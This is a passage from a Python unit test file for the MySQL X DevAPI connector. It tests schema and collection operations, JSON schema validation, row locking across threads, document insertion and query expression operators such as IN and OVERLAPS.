self.collection.add(doc_1).execute()
self.assertEqual(1, self.collection.count())
# Don't allow _id assignment
self.assertRaises(mysqlx.ProgrammingError,
doc_1.__setitem__, "_id", "1")
doc_2 = {"_id": "2", "name": "Wilma", "age": 33}
self.collection.add(doc_2).execute()
self.assertEqual(2, self.collection.count())
# Copying a DbDoc
doc_3 = self.collection.find().execute().fetch_one()
doc_4 = doc_3.copy("new_id")
self.assertEqual(doc_4["_id"], "new_id")
self.assertNotEqual(doc_3, doc_4)
# Copying a DbDoc without _id
doc_5 = mysqlx.DbDoc({"name": "Fred", "age": 21})
doc_6 = doc_5.copy()
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 14), "XPlugin not compatible")
class MySQLxSchemaTests(tests.MySQLxTests):
def setUp(self):
self.connect_kwargs = tests.get_mysqlx_config()
self.schema_name = self.connect_kwargs["schema"]
try:
self.session = mysqlx.get_session(self.connect_kwargs)
except mysqlx.Error as err:
self.fail("{0}".format(err))
self.schema = self.session.get_schema(self.schema_name)
def tearDown(self):
self.session.close()
def test_exists_in_database(self):
# Test with special chars
schema_name_1 = "myschema%"
schema_name_2 = "myschema_"
schema_1 = self.session.create_schema(schema_name_1)
self.assertTrue(schema_1.exists_in_database())
schema_2 = self.session.create_schema(schema_name_2)
self.assertTrue(schema_2.exists_in_database())
self.session.drop_schema(schema_name_1)
self.session.drop_schema(schema_name_2)
def test_get_session(self):
session = self.schema.get_session()
self.assertEqual(session, self.session)
self.assertTrue(self.schema.exists_in_database())
bad_schema = self.session.get_schema("boo")
self.assertFalse(bad_schema.exists_in_database())
def test_create_collection(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name, True)
self.assertEqual(collection.get_name(), collection_name)
self.assertTrue(collection.exists_in_database())
# reusing the existing collection should work
collection = self.schema.create_collection(collection_name, True)
self.assertEqual(collection.get_name(), collection_name)
self.assertTrue(collection.exists_in_database())
# should get exception if reuse is false and it already exists
self.assertRaises(mysqlx.ProgrammingError,
self.schema.create_collection, collection_name,
False)
# should get exception if using an invalid name
self.assertRaises(mysqlx.ProgrammingError,
self.schema.create_collection, "")
self.assertRaises(mysqlx.ProgrammingError,
self.schema.create_collection, None)
self.schema.drop_collection(collection_name)
def test_get_collection(self):
collection_name = "collection_test"
coll = self.schema.get_collection(collection_name)
self.assertFalse(coll.exists_in_database())
coll = self.schema.create_collection(collection_name)
self.assertTrue(coll.exists_in_database())
self.schema.drop_collection(collection_name)
def test_get_view(self):
table_name = "table_test"
view_name = "view_test"
view = self.schema.get_view(view_name)
self.assertFalse(view.exists_in_database())
self.session.sql(_CREATE_TEST_TABLE_QUERY.format(
self.schema_name, table_name)).execute()
defined_as = "SELECT id FROM {0}.{1}".format(self.schema_name,
table_name)
view = create_view(self.schema, view_name, defined_as)
self.assertTrue(view.exists_in_database())
# raise a ProgrammingError if the view does not exists
self.assertRaises(mysqlx.ProgrammingError,
self.schema.get_view, "nonexistent",
check_existence=True)
drop_table(self.schema, table_name)
drop_view(self.schema, view_name)
def test_get_collections(self):
coll = self.schema.get_collections()
self.assertEqual(0, len(coll), "Should have returned 0 objects")
self.schema.create_collection("coll1")
self.schema.create_collection("coll2")
self.schema.create_collection("coll3")
coll = self.schema.get_collections()
self.assertEqual(3, len(coll), "Should have returned 3 objects")
self.assertEqual("coll1", coll[0].get_name())
self.assertEqual("coll2", coll[1].get_name())
self.assertEqual("coll3", coll[2].get_name())
self.schema.drop_collection("coll1")
self.schema.drop_collection("coll2")
self.schema.drop_collection("coll3")
def test_get_tables(self):
tables = self.schema.get_tables()
self.assertEqual(0, len(tables), "Should have returned 0 objects")
self.session.sql(_CREATE_TEST_TABLE_QUERY.format(
self.schema_name, "table1")).execute()
self.session.sql(_CREATE_TEST_TABLE_QUERY.format(
self.schema_name, "table2")).execute()
self.session.sql(_CREATE_TEST_TABLE_QUERY.format(
self.schema_name, "table3")).execute()
self.session.sql(_CREATE_TEST_VIEW_QUERY.format(
self.schema_name, "view1",
self.schema_name, "table1")).execute()
tables = self.schema.get_tables()
self.assertEqual(4, len(tables), "Should have returned 4 objects")
self.assertEqual("table1", tables[0].get_name())
self.assertEqual("table2", tables[1].get_name())
self.assertEqual("table3", tables[2].get_name())
self.assertEqual("view1", tables[3].get_name())
drop_table(self.schema, "table1")
drop_table(self.schema, "table2")
drop_table(self.schema, "table3")
drop_view(self.schema, "view1")
def test_drop_collection(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
self.schema.drop_collection(collection_name)
self.assertFalse(collection.exists_in_database())
# dropping an non-existing collection should succeed silently
self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 19),
"Schema validation unavailable.")
def test_schema_validation(self):
collection_name = "collection_test"
json_schema = {
"id": "http://json-schema.org/geo",
"$schema": "http://json-schema.org/draft-07/schema#",
"title": "Longitude and Latitude Values",
"description": "A geographical coordinate",
"required": ["latitude", "longitude"],
"type": "object",
"properties": {
"latitude": {
"type": "number",
"minimum": -90,
"maximum": 90
},
"longitude": {
"type": "number",
"minimum": -180,
"maximum": 180
}
},
}
json_schema_string = json.dumps(json_schema)
# Invalid validation options cases
invalid_options = [
"",
-1,
{},
{"foo": "bar"},
{"level": None, "schema": None},
{"level": "off", "schema": True},
{"level": "off", "schema": None},
{"level": "on", "schema": json_schema},
{"level": True, "schema": json_schema},
]
# Test Schema.create_schema() validation options
for validation in invalid_options:
self.assertRaises(mysqlx.ProgrammingError,
self.schema.create_collection,
collection_name,
validation=validation)
# Invalid option in validation
self.assertRaises(mysqlx.ProgrammingError,
self.schema.create_collection,
collection_name,
validation={"level": "strict",
"schema": json_schema,
"invalid": "option"})
# Test using JSON schema as dict
coll = self.schema.create_collection(
collection_name, validation={"level": "strict",
"schema": json_schema})
# The latitude and longitude should be numbers
self.assertRaises(mysqlx.OperationalError,
coll.add({"latitude": "41.14961",
"longitude": "-8.61099"}).execute)
coll.add({"latitude": 41.14961, "longitude": -8.61099}).execute()
self.assertEqual(1, coll.count())
self.schema.drop_collection(collection_name)
# Test JSON schema as string
coll = self.schema.create_collection(
collection_name, validation={"level": "strict",
"schema": json_schema_string})
self.assertRaises(mysqlx.OperationalError,
coll.add({"latitude": "41.14961",
"longitude": "-8.61099"}).execute)
coll.add({"latitude": 41.14961, "longitude": -8.61099}).execute()
self.assertEqual(1, coll.count())
# Test Schema.modify_collection() validation options
for validation in invalid_options:
self.assertRaises(mysqlx.ProgrammingError,
self.schema.modify_collection,
collection_name,
validation=validation)
# Test Schema.modify_collection()
coll.modify("TRUE").set("location", "Porto/Portugal").execute()
json_schema["properties"]["location"] = {"type": "string"}
json_schema["required"].append("location")
self.schema.modify_collection(
collection_name, validation={"level": "strict",
"schema": json_schema})
# The 'location' property is required
self.assertRaises(mysqlx.OperationalError,
coll.add({"latitude": 41.14961,
"longitude": -8.61099}).execute)
coll.add({"location": "Porto/Portugal",
"latitude": 41.14961,
"longitude": -8.61099}).execute()
self.assertEqual(2, coll.count())
# Test using only 'level' option in Schema.modify_collectioa()
self.schema.modify_collection(
collection_name, validation={"level": "off"})
# Test using only 'schema' option in Schema.modify_collection()
self.schema.modify_collection(
collection_name, validation={"schema": json_schema})
# Test validation without any information in Schema.modify_collection()
self.schema.modify_collection(
collection_name, validation={"schema": json_schema})
# Drop the collection
self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION >= (8, 0, 19),
"Schema validation is available.")
def test_unsupported_schema_validation(self):
collection_name = "collection_test"
json_schema = {
"id": "http://json-schema.org/geo",
"$schema": "http://json-schema.org/draft-07/schema#",
"title": "Longitude and Latitude Values",
"description": "A geographical coordinate",
"required": ["latitude", "longitude"],
"type": "object",
"properties": {
"latitude": {
"type": "number",
"minimum": -90,
"maximum": 90
},
"longitude": {
"type": "number",
"minimum": -180,
"maximum": 180
}
},
}
# Test creating a schema-less collection on server < 8.0.19
coll = self.schema.create_collection(collection_name)
self.schema.drop_collection(collection_name)
# Test creating a collection with validation on server < 8.0.19
self.assertRaises(mysqlx.NotSupportedError,
self.schema.create_collection,
collection_name,
validation={"level": "strict",
"schema": json_schema})
# Test modifying a collection with validation on server < 8.0.19
self.assertRaises(mysqlx.NotSupportedError,
self.schema.modify_collection,
collection_name,
validation={"level": "strict",
"schema": json_schema})
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 14), "XPlugin not compatible")
class MySQLxCollectionTests(tests.MySQLxTests):
def setUp(self):
self.connect_kwargs = tests.get_mysqlx_config()
self.schema_name = self.connect_kwargs["schema"]
try:
self.session = mysqlx.get_session(self.connect_kwargs)
except mysqlx.Error as err:
self.fail("{0}".format(err))
self.schema = self.session.get_schema(self.schema_name)
def tearDown(self):
self.session.close()
def test_exists_in_database(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
self.assertTrue(collection.exists_in_database())
self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 3), "Row locks unavailable.")
def test_lock_shared(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
collection.add({"_id": "1", "name": "Fred", "age": 21}).execute()
waiting = threading.Event()
lock_a = threading.Lock()
lock_b = threading.Lock()
errors = []
def client_a(lock_a, lock_b, waiting):
sess1 = mysqlx.get_session(self.connect_kwargs)
schema = sess1.get_schema(self.schema_name)
collection = schema.get_collection(collection_name)
sess1.start_transaction()
result = collection.find("name = 'Fred'").lock_shared().execute()
lock_a.release()
lock_b.acquire()
time.sleep(2)
if waiting.is_set():
errors.append("S-S lock test failure.")
sess1.commit()
return
sess1.commit()
sess1.start_transaction()
result = collection.find("name = 'Fred'").lock_shared().execute()
lock_b.release()
lock_a.acquire()
time.sleep(2)
if not waiting.is_set():
errors.append("S-X lock test failure.")
sess1.commit()
return
sess1.commit()
def client_b(lock_a, lock_b, waiting):
sess1 = mysqlx.get_session(self.connect_kwargs)
schema = sess1.get_schema(self.schema_name)
collection = schema.get_collection(collection_name)
lock_a.acquire()
sess1.start_transaction()
waiting.set()
lock_b.release()
result = collection.find("name = 'Fred'").lock_shared().execute()
waiting.clear()
sess1.commit()
lock_b.acquire()
sess1.start_transaction()
waiting.set()
lock_a.release()
result = collection.find("name = 'Fred'").lock_exclusive().execute()
waiting.clear()
sess1.commit()
client1 = threading.Thread(target=client_a,
args=(lock_a, lock_b, waiting,))
client2 = threading.Thread(target=client_b,
args=(lock_a, lock_b, waiting,))
lock_a.acquire()
lock_b.acquire()
client1.start()
client2.start()
client1.join()
client2.join()
self.schema.drop_collection(collection_name)
if errors:
self.fail(errors[0])
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 3), "Row locks unavailable.")
def test_lock_exclusive(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
collection.add({"_id": "1", "name": "Fred", "age": 21}).execute()
event = threading.Event()
pause = threading.Event()
locking = threading.Event()
waiting = threading.Event()
errors = []
def client_a(pause, locking, waiting):
sess1 = mysqlx.get_session(self.connect_kwargs)
schema = sess1.get_schema(self.schema_name)
collection = schema.get_collection(collection_name)
sess1.start_transaction()
result = collection.find("name = 'Fred'").lock_exclusive().execute()
locking.set()
time.sleep(2)
locking.clear()
if not waiting.is_set():
sess1.commit()
errors.append("X-X lock test failure.")
return
sess1.commit()
pause.set()
sess1.start_transaction()
result = collection.find("name = 'Fred'").lock_exclusive().execute()
locking.set()
time.sleep(2)
locking.clear()
if not waiting.is_set():
errors.append("X-S lock test failure.")
sess1.commit()
return
sess1.commit()
def client_b(pause, locking, waiting):
sess1 = mysqlx.get_session(self.connect_kwargs)
schema = sess1.get_schema(self.schema_name)
collection = schema.get_collection(collection_name)
if not locking.wait(2):
return
sess1.start_transaction()
waiting.set()
result = collection.find("name = 'Fred'").lock_exclusive().execute()
waiting.clear()
sess1.commit()
if not pause.wait(2):
return
if not locking.wait(2):
return
sess1.start_transaction()
waiting.set()
result = collection.find("name = 'Fred'").lock_shared().execute()
waiting.clear()
sess1.commit()
client1 = threading.Thread(target=client_a,
args=(pause, locking, waiting,))
client2 = threading.Thread(target=client_b,
args=(pause, locking, waiting,))
client1.start()
client2.start()
client1.join()
client2.join()
self.schema.drop_collection(collection_name)
if errors:
self.fail(errors[0])
@unittest.skipIf(tests.MYSQL_VERSION > (8, 0, 4),
"id field creation on server must not be available.")
def test_add_old_versions(self):
"""Tests error message when adding documents without an ids on old
servers"""
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
coll_add = collection.add({"name": "Fred", "age": 21})
self.assertRaises(mysqlx.errors.OperationalError, coll_add.execute)
# Providing _id for each document must allow his insertion
persons = [{"_id": "12345678901234567890123456789012",
"name": "Dyno dog dinosaur", "age": 33},
{"_id": "12345678901234567890123456789013",
"name": "Puss saber-toothed cat", "age": 42}]
result = collection.add(persons).execute()
self.assertEqual(2, result.get_affected_items_count(),
"documents not inserted")
# Empty list is expected here since the server did not generate the ids
self.assertEqual([], result.get_generated_ids(),
"_id from user was overwritten")
self.schema.drop_collection(collection_name)
def _test_lock_contention(self, lock_type_1, lock_type_2, lock_contention):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
collection.add({"name": "Fred", "age": 21}).execute()
locking = threading.Event()
waiting = threading.Event()
errors = []
def thread_a(locking, waiting):
session = mysqlx.get_session(self.connect_kwargs)
schema = session.get_schema(self.schema_name)
collection = schema.get_collection(collection_name)
session.start_transaction()
result = collection.find("name = 'Fred'")
if lock_type_1 == "S":
result.lock_shared().execute()
else:
result.lock_exclusive().execute()
locking.set()
time.sleep(2)
locking.clear()
if not waiting.is_set():
errors.append("{0}-{0} lock test failure."
"".format(lock_type_1, lock_type_2))
session.commit()
return
session.commit()
def thread_b(locking, waiting):
session = mysqlx.get_session(self.connect_kwargs)
schema = session.get_schema(self.schema_name)
collection = schema.get_collection(collection_name)
if not locking.wait(2):
errors.append("{0}-{0} lock test failure."
"".format(lock_type_1, lock_type_2))
session.commit()
return
session.start_transaction()
if lock_type_2 == "S":
result = collection.find("name = 'Fred'") \
.lock_shared(lock_contention)
else:
result = collection.find("name = 'Fred'") \
.lock_exclusive(lock_contention)
if lock_contention == mysqlx.LockContention.NOWAIT \
and (lock_type_1 == "X" or lock_type_2 == "X"):
self.assertRaises(mysqlx.OperationalError, result.execute)
session.rollback()
waiting.set()
time.sleep(4)
session.start_transaction()
result.execute()
session.commit()
waiting.clear()
client1 = threading.Thread(target=thread_a, args=(locking, waiting,))
client2 = threading.Thread(target=thread_b, args=(locking, waiting,))
client1.start()
client2.start()
client1.join()
client2.join()
self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 5),
"Lock contention unavailable.")
def test_lock_shared_with_nowait(self):
self._test_lock_contention("S", "S", mysqlx.LockContention.NOWAIT)
self._test_lock_contention("S", "X", mysqlx.LockContention.NOWAIT)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 5),
"Lock contention unavailable.")
def test_lock_exclusive_with_nowait(self):
self._test_lock_contention("X", "X", mysqlx.LockContention.NOWAIT)
self._test_lock_contention("X", "S", mysqlx.LockContention.NOWAIT)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 5),
"Lock contention unavailable.")
def test_lock_shared_with_skip_locked(self):
self._test_lock_contention("S", "S", mysqlx.LockContention.SKIP_LOCKED)
self._test_lock_contention("S", "X", mysqlx.LockContention.SKIP_LOCKED)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 5),
"Lock contention unavailable.")
def test_lock_exclusive_with_skip_locker(self):
self._test_lock_contention("X", "X", mysqlx.LockContention.SKIP_LOCKED)
self._test_lock_contention("X", "S", mysqlx.LockContention.SKIP_LOCKED)
def test_add(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
result = collection.add(
{"_id": 1, "name": "Fred", "age": 21}
).execute()
self.assertEqual(result.get_affected_items_count(), 1)
self.assertEqual(1, collection.count())
# Adding multiple dictionaries at once
result = collection.add(
{"_id": 2, "name": "Wilma", "age": 33},
{"_id": 3, "name": "Barney", "age": 42}
).execute()
self.assertEqual(result.get_affected_items_count(), 2)
self.assertEqual(3, collection.count())
# Adding JSON strings
result = collection.add(
'{"_id": 4, "name": "Bambam", "age": 8}',
'{"_id": 5, "name": "Pebbles", "age": 8}'
).execute()
self.assertEqual(result.get_affected_items_count(), 2)
self.assertEqual(5, collection.count())
# All strings should be considered literal, for expressions
# mysqlx.expr() function must be used
collection.add(
{"_id": "6", "status": "Approved",
"email": "Fred (fred@example.com)"},
{"_id": "7", "status": "Rejected\n(ORA:Pending)",
"email": "Barney (barney@example.com)"},
).execute()
result = collection.find().execute()
self.assertEqual(7, len(result.fetch_all()))
# test unicode
result = collection.add({"_id": "8", "age": 1, "name": u"😀"}).execute()
self.assertEqual(result.get_affected_items_count(), 1)
self.assertEqual(8, collection.count())
if tests.MYSQL_VERSION > (8, 0, 4):
# Following test are only possible on servers with id generetion.
# Ensure _id is created at the server side
persons = [{"name": "Wilma", "age": 33},
{"name": "Barney", "age": 42}]
result = collection.add(persons).execute()
for person in persons:
# Ensure no '_id' field was added locally.
if tests.PY2:
self.assertFalse(person.has_key("_id"))
else:
self.assertFalse("_id" in person)
self.assertEqual(2, result.get_affected_items_count(),
"Not all documents were inserted")
# Allow _id given from the user and server side generation
persons = [{"_id": "12345678901234567890123456789012",
"name": "Dyno", "desc": "dog dinosaur"},
{"_id": "12345678901234567890123456789013",
"name": "Puss", "desc": "saber-toothed cat"},
# following doc does not have id field and must be
# generated at the server side
{"name": "hoppy", "desc": "hoppy kangaroo/dinosaur"}]
result = collection.add(persons).execute()
self.assertEqual(3, result.get_affected_items_count(),
"Not all documents were inserted")
# Only 1 `_id` was generated, 2 were given by us.
self.assertEqual(1, len(result.get_generated_ids()),
"Unexpected number of _id were generated.")
result = collection.find().execute()
for row in result.fetch_all():
self.assertTrue(hasattr(row, "_id"),
"`_id` field could not be found in doc")
self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 2),
"CONT_IN operator unavailable")
def test_cont_in_operator(self):
collection_name = "{0}.test".format(self.schema_name)
collection = self.schema.create_collection(collection_name)
collection.add({
"_id": "a6f4b93e1a264a108393524f29546a8c",
"title": "AFRICAN EGG",
"description": "A Fast-Paced Documentary of a Pastry Chef And a "
"Dentist who must Pursue a Forensic Psychologist in "
"The Gulf of Mexico",
"releaseyear": 2006,
"language": "English",
"duration": 130,
"rating": "G",
"genre": "Science fiction",
"actors": [{
"name": "MILLA PECK",
"country": "Mexico",
"birthdate": "12 Jan 1984"
}, {
"name": "VAL BOLGER",
"country": "Botswana",
"birthdate": "26 Jul 1975"
}, {
"name": "SCARLETT BENING",
"country": "Syria",
"birthdate": "16 Mar 1978"
}],
"additionalinfo": {
"director": "Sharice Legaspi",
"writers": ["Rusty Couturier", "Angelic Orduno", "Carin Postell"],
"productioncompanies": ["Qvodrill", "Indigoholdings"]
}
}).execute()
if tests.MYSQL_VERSION >= (8, 0, 17):
# To comply with the SQL standard, IN returns NULL not only if the
# expression on the left hand side is NULL, but also if no match
# is found in the list and one of the expressions in the list is NULL.
not_found_without_null = False
not_found_with_null = None
# Value false match result changed
value_false_match_everything = False
else:
not_found_without_null = None
not_found_with_null = True
value_false_match_everything = True
test_cases = [
("(1+5) in (1, 2, 3, 4, 5)", False),
("(1>5) in (true, false)", True),
("('a'>'b') in (true, false)", True),
("(1>5) in [true, false]", None),
("(1+5) in [1, 2, 3, 4, 5]", None),
("('a'>'b') in [true, false]", None),
("true IN [(1>5), !(false), (true || false), (false && true)]",
True),
("true IN ((1>5), !(false), (true || false), (false && true))",
True),
("{ 'name' : 'MILLA PECK' } IN actors", True),
("{\"field\":true} IN (\"mystring\", 124, myvar, othervar.jsonobj)",
not_found_without_null),
("actor.name IN ['a name', null, (1<5-4), myvar.jsonobj.name]",
None),
("!false && true IN [true]", True),
("1-5/2*2 > 3-2/1*2 IN [true, false]", None),
("true IN [1-5/2*2 > 3-2/1*2]", False),
("'African Egg' IN ('African Egg', 1, true, NULL, [0,1,2], "
"{ 'title' : 'Atomic Firefighter' })", True),
("1 IN ('African Egg', 1, true, NULL, [0,1,2], "
"{ 'title' : 'Atomic Firefighter' })", True),
("true IN ('African Egg', 1, false, NULL, [0,1,2], "
"{ 'title' : 'Atomic Firefighter' })", not_found_with_null),
("false IN ('African Egg', 1, true, NULL, [0,1,2], "
"{ 'title' : 'Atomic Firefighter' })", not_found_with_null),
("false IN ('African Egg', 1, true, 'No null', [0,1,2], "
"{ 'title' : 'Atomic Firefighter' })", value_false_match_everything),
("[0,1,2] IN ('African Egg', 1, true, NULL, [0,1,2], "
"{ 'title' : 'Atomic Firefighter' })", True),
("{ 'title' : 'Atomic Firefighter' } IN ('African Egg', 1, true, "
"NULL, [0,1,2], { 'title' : 'Atomic Firefighter' })", True),
("title IN ('African Egg', 'The Witcher', 'Jurassic Perk')", False),
("releaseyear IN (2006, 2010, 2017)", True),
("'African Egg' in movietitle", None),
("0 NOT IN [1,2,3]", True),
("1 NOT IN [1,2,3]", False),
("'' IN title", False),
("title IN ('', ' ')", False),
("title IN ['', ' ']", False),
("[\"Rusty Couturier\", \"Angelic Orduno\", \"Carin Postell\"] IN "
"additionalinfo.writers", True),
("{ \"name\" : \"MILLA PECK\", \"country\" : \"Mexico\", "
"\"birthdate\": \"12 Jan 1984\"} IN actors", True),
("releaseyear IN [2006, 2007, 2008]", True),
("true IN title", False),
("false IN genre", False),
("'Sharice Legaspi' IN additionalinfo.director", True),
("'Mexico' IN actors[*].country", True),
("'Angelic Orduno' IN additionalinfo.writers", True),
]
for test in test_cases:
try:
result = collection.find() \
.fields("{0} as res".format(test[0])) \
.execute().fetch_one()
except:
self.assertEqual(None, test[1])
else:
self.assertEqual(result['res'], test[1], "For test case {} "
"result was {}".format(test, result))
self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 17),
"OVERLAPS operator unavailable")
def test_overlaps_operator(self):
collection_name = "{0}.test".format(self.schema_name)
collection = self.schema.create_collection(collection_name)
collection.add({
"_id": "a6f4b93e1a264a108393524f29546a8c",
"title": "AFRICAN EGG",
"description": "A Fast-Paced Documentary of a Pastry Chef And a "
"Dentist who must Pursue a Forensic Psychologist in "
"The Gulf of Mexico",
"releaseyear": 2006,
"language": "English",
"duration": 130,
"rating": "G",
"genre": "Science fiction",
"actors": [{
"name": "MILLA PECK",
"country": "Mexico",
"birthdate": "12 Jan 1984"
}, {
"name": "VAL BOLGER",
"country": "Botswana",
"birthdate": "26 Jul 1975"
}, {
"name": "SCARLETT BENING",
"country": "Syria",
"birthdate": "16 Mar 1978"
}],
"additionalinfo": {
"director": "Sharice Legaspi",
"writers": ["Rusty Couturier", "Angelic Orduno", "Carin Postell"],
"productioncompanies": ["Qvodrill", "Indigoholdings"]
}
}).execute()
test_cases = [
("(1+5) overlaps (1, 2, 3, 4, 5)", None),
("(1>5) overlaps (true, false)", None),
("('a'>'b') overlaps (true, false)", None),
("(1>5) overlaps [true, false]", None),
("[1>5] overlaps [true, false]", True),
("[(1+5)] overlaps [1, 2, 3, 4, 5]", False),
("[(1+4)] overlaps [1, 2, 3, 4, 5]", True),
("('a'>'b') overlaps [true, false]", None),
("true overlaps [(1>5), !(false), (true || false), (false && true)]",
True),
("true overlaps ((1>5), !(false), (true || false), (false && true))",
None),
("{ 'name' : 'MILLA PECK' } overlaps actors", False),
("{\"field\":true} overlaps (\"mystring\", 124, myvar, othervar.jsonobj)",
None),
("actor.name overlaps ['a name', null, (1<5-4), myvar.jsonobj.name]",
None),
("!false && true overlaps [true]", True),
("1-5/2*2 > 3-2/1*2 overlaps [true, false]", None),
("true IN [1-5/2*2 > 3-2/1*2]", False),
("'African Egg' overlaps ('African Egg', 1, true, NULL, [0,1,2], "
"{ 'title' : 'Atomic Firefighter' })", None),
("1 overlaps ('African Egg', 1, true, NULL, [0,1,2], "
"{ 'title' : 'Atomic Firefighter' })", None),
("true overlaps ('African Egg', 1, false, NULL, [0,1,2], "
"{ 'title' : 'Atomic Firefighter' })", None),
("false overlaps ('African Egg', 1, true, NULL, [0,1,2], "
"{ 'title' : 'Atomic Firefighter' })", None),
("false overlaps ('African Egg', 1, true, 'No null', [0,1,2], "
"{ 'title' : 'Atomic Firefighter' })", None),
("[0,1,2] overlaps ('African Egg', 1, true, NULL, [0,1,2], "
"{ 'title' : 'Atomic Firefighter' })", None),
("{ 'title' : 'Atomic Firefighter' } overlaps ('African Egg', 1, true, "
"NULL, [0,1,2], { 'title' : 'Atomic Firefighter' })", None),
("title overlaps ('African Egg', 'The Witcher', 'Jurassic Perk')", None),
("releaseyear overlaps (2006, 2010, 2017)", None),
("'African overlaps' in movietitle", None),
("0 NOT overlaps [1,2,3]", True),
("1 NOT overlaps [1,2,3]", False),
("[0] NOT overlaps [1,2,3]", True),
("[1] NOT overlaps [1,2,3]", False),
("[!false && true] OVERLAPS [true]", True),
("[!false AND true] OVERLAPS [true]", True),
("[!false & true] OVERLAPS [true]", False),
("'' IN title", False),
("title overlaps ('', ' ')", None),
("title overlaps ['', ' ']", False),
("[\"Rusty Couturier\", \"Angelic Orduno\", \"Carin Postell\"] IN "
"additionalinfo.writers", True),
("{ \"name\" : \"MILLA PECK\", \"country\" : \"Mexico\", "
"\"birthdate\": \"12 Jan 1984\"} IN actors", True),
("releaseyear IN [2006, 2007, 2008]", True),
("true overlaps title", False),
("false overlaps genre", False),
("'Sharice Legaspi' overlaps additionalinfo.director", True),
("'Mexico' overlaps actors[*].country", True),
("'Angelic Orduno' overlaps additionalinfo.writers", True),
("[([1,2] overlaps [1,2])] overlaps [false] invalid [true]", None),
("[([1] overlaps [2])] overlaps [3] invalid [true] as res", None),
("[] []", None),
("[] TRUE as res", None)
]
for test in test_cases:
try:
result = collection.find() \
.fields("{0} as res".format(test[0])) \
.execute().fetch_one()
except:
self.assertEqual(None, test[1], "For test case {} "
"exeption was not expected.".format(test))
else:
self.assertEqual(result['res'], test[1], "For test case {} "
"result was {}".format(test, result))
self.schema.drop_collection(collection_name)
def test_ilri_expressions(self):
collection_name = "{0}.test".format(self.schema_name)
collection = self.schema.create_collection(collection_name)
collection.add(
{"_id": "1", "name": "Fred", "age": 21},
{"_id": "2", "name": "Barney", "age": 28},
{"_id": "3", "name": "Wilma", "age": 42},
{"_id": "4", "name": "Betty", "age": 67},
).execute()
# is
result = collection.find("$.key is null").execute()
self.assertEqual(4, len(result.fetch_all()))
# is_not
result = collection.find("$.key is not null").execute()
self.assertEqual(0, len(result.fetch_all()))
# regexp
result = collection.find("$.name regexp 'F.*'").execute()
self.assertEqual(1, len(result.fetch_all()))
# not_regexp
result = collection.find("$.name not regexp 'F.*'").execute()
self.assertEqual(3, len(result.fetch_all()))
# like
result = collection.find("$.name like 'F%'").execute()
self.assertEqual(1, len(result.fetch_all()))
# not_like
result = collection.find("$.name not like 'F%'").execute()
self.assertEqual(3, len(result.fetch_all()))
# in
result = collection.find("$.age in (21, 28)").execute()
self.assertEqual(2, len(result.fetch_all()))
# not_in
result = collection.find("$.age not in (21, 28)").execute()
self.assertEqual(2, len(result.fetch_all()))
# between
result = collection.find("$.age between 20 and 29").execute()
self.assertEqual(2, len(result.fetch_all()))
# between_not
result = collection.find("$.age not between 20 and 29").execute()
self.assertEqual(2, len(result.fetch_all()))
self.schema.drop_collection(collection_name)
def test_unary_operators(self):
collection_name = "{0}.test".format(self.schema_name)
collection = self.schema.create_collection(collection_name)
collection.add(
{"_id": "1", "name": "Fred", "age": 21},
{"_id": "2", "name": "Barney", "age": 28},
{"_id": "3", "name": "Wilma", "age": 42},
{"_id": "4", "name": "Betty", "age": 67},
).execute()
# sign_plus
result = collection.find("$.age == 21") \
.fields("+($.age * -1) as test").execute()
self.assertEqual(-21, result.fetch_all()[0]["test"])
# sign_minus
result = collection.find("$.age == 21") \
.fields("-$.age as test").execute()
self.assertEqual(-21, result.fetch_all()[0]["test"])
# !
result = collection.find("$.age == 21") \
.fields("! ($.age == 21) as test").execute()
self.assertFalse(result.fetch_all()[0]["test"])
# not
result = collection.find("$.age == 21") \
.fields("not ($.age == 21) as test").execute()
self.assertFalse(result.fetch_all()[0]["test"])
# ~
result = collection.find("$.age == 21") \
.fields("5 & ~1 as test").execute()
self.assertEqual(4, result.fetch_all()[0]["test"])
self.schema.drop_collection(collection_name)
def test_interval_expressions(self):
collection_name = "{0}.test".format(self.schema_name)
collection = self.schema.create_collection(collection_name)
collection.add({"_id": "1", "adate": "2000-01-01",
"adatetime": "2000-01-01 12:00:01"}).execute()
result = collection.find().fields("$.adatetime + interval 1000000 "
"microsecond = '2000-01-01 12:00:02'"
" as test").execute()
self.assertTrue(result.fetch_all()[0]["test"])
result = collection.find().fields("$.adatetime + interval 1 second = "
"'2000-01-01 12:00:02' "
"as test").execute()
self.assertTrue(result.fetch_all()[0]["test"])
result = collection.find().fields("$.adatetime + interval 2 minute = "
"'2000-01-01 12:02:01' "
"as test").execute()
self.assertTrue(result.fetch_all()[0]["test"])
result = collection.find().fields("$.adatetime + interval 4 hour = "
"'2000-01-01 16:00:01' "
"as test").execute()
self.assertTrue(result.fetch_all()[0]["test"])
result = collection.find().fields("$.adate + interval 10 day = "
"'2000-01-11' as test").execute()
self.assertTrue(result.fetch_all()[0]["test"])
result = collection.find().fields("$.adate + interval 2 week = "
"'2000-01-15' as test").execute()
self.assertTrue(result.fetch_all()[0]["test"])
result = collection.find().fields("$.adate - interval 2 month = "
"'1999-11-01' as test").execute()
self.assertTrue(result.fetch_all()[0]["test"])
result = collection.find().fields("$.adate + interval 2 quarter = "
"'2000-07-01' as test").execute()
self.assertTrue(result.fetch_all()[0]["test"])
